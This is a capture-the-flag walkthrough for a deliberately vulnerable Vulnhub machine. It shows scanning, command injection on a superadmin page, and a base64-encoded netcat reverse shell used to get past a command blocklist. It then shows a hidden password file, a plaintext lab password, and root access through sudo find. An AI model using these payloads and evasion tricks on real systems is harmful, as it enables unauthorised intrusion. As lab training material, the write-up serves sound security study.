hacklabs no name walkthrough Vulnhub CTF is created by HacLabs the VM is hosted on Vulnhub server you can download here
Network Scanning
First, we scanning our local network
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netdiscover |
basic nmap scanning all port
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nmap -A -p- |
we see the scanning details our target machine only port 80 http is open
I run the dirb web scanning tool with an extension .php and we found a superadmin.php URL
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dirb /usr/share/wordlists/dirb/big.txt -X .php |
When I visit the website superadmin page we found a command injection here I run the id command we see the target uid and group id
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ping |id |
I run the many commands but I didn’t see anything after some time I open the superadmin.php file with cat command and again we didn’t see anything
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|cat superadmin.php |
but we see the page source we found superadmin.php source code and see many commands is restricted. like /, ; ls, nc, dir, pwd etc.
So we can use nc.traditional
to get a reverse shell but the issue with that would be nc
the string would still be detected. So to bypass this I simply base64 encoded the following payload
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nc.traditional -e /bin/bash 4545 |
After encoding the reverse shell first we start our natcat payload listener and paste the code command injection field starting pipe
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nc -lvp 4545 |
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| `echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMS4xOSA0NTQ1" | base64 -d |
and we see our natcat connection is connected our target but we see blank shell now importing python3 module
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python3 -c 'import pty;pty.spawn("/bin/bash")' |
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cd /home cd yash |
First Flag
After enumeration, many scripts and commands I didn’t find anything so I move the user yash home directory and I fount our first flag.txt and we see the massage hacklabs password in a hidden file.
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cat flag1.txt |
Finding our second flag with the find command advanced search using the file type ( -type f ) filter and owner of all file user yash
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find / -type f -user yash 2>dev/null |
our Scanning is complete we see the .passwd hidden file now open the file cat command
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cat /usr/share/hidden/.passwd |
Second Flag
changing our user upgrading shell we already found hacklabas password our second flag
- su hacklabs
- password: hacklabs1235
I run the sudo -l
the command to see which command hacklabs run without asking root password and we see the /usr/bin/find command run without root password
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sudo -l |
we search to find command privilege escalation on google and I found a sudoers command I run the command extra parameter -u root
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sudo -u root find . -exec /bin/bash \; -quit |
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cd root cat flag3.txt |
we found our final flag3.txt
Another vulnhub walkthrough MuzzyBox: 1 read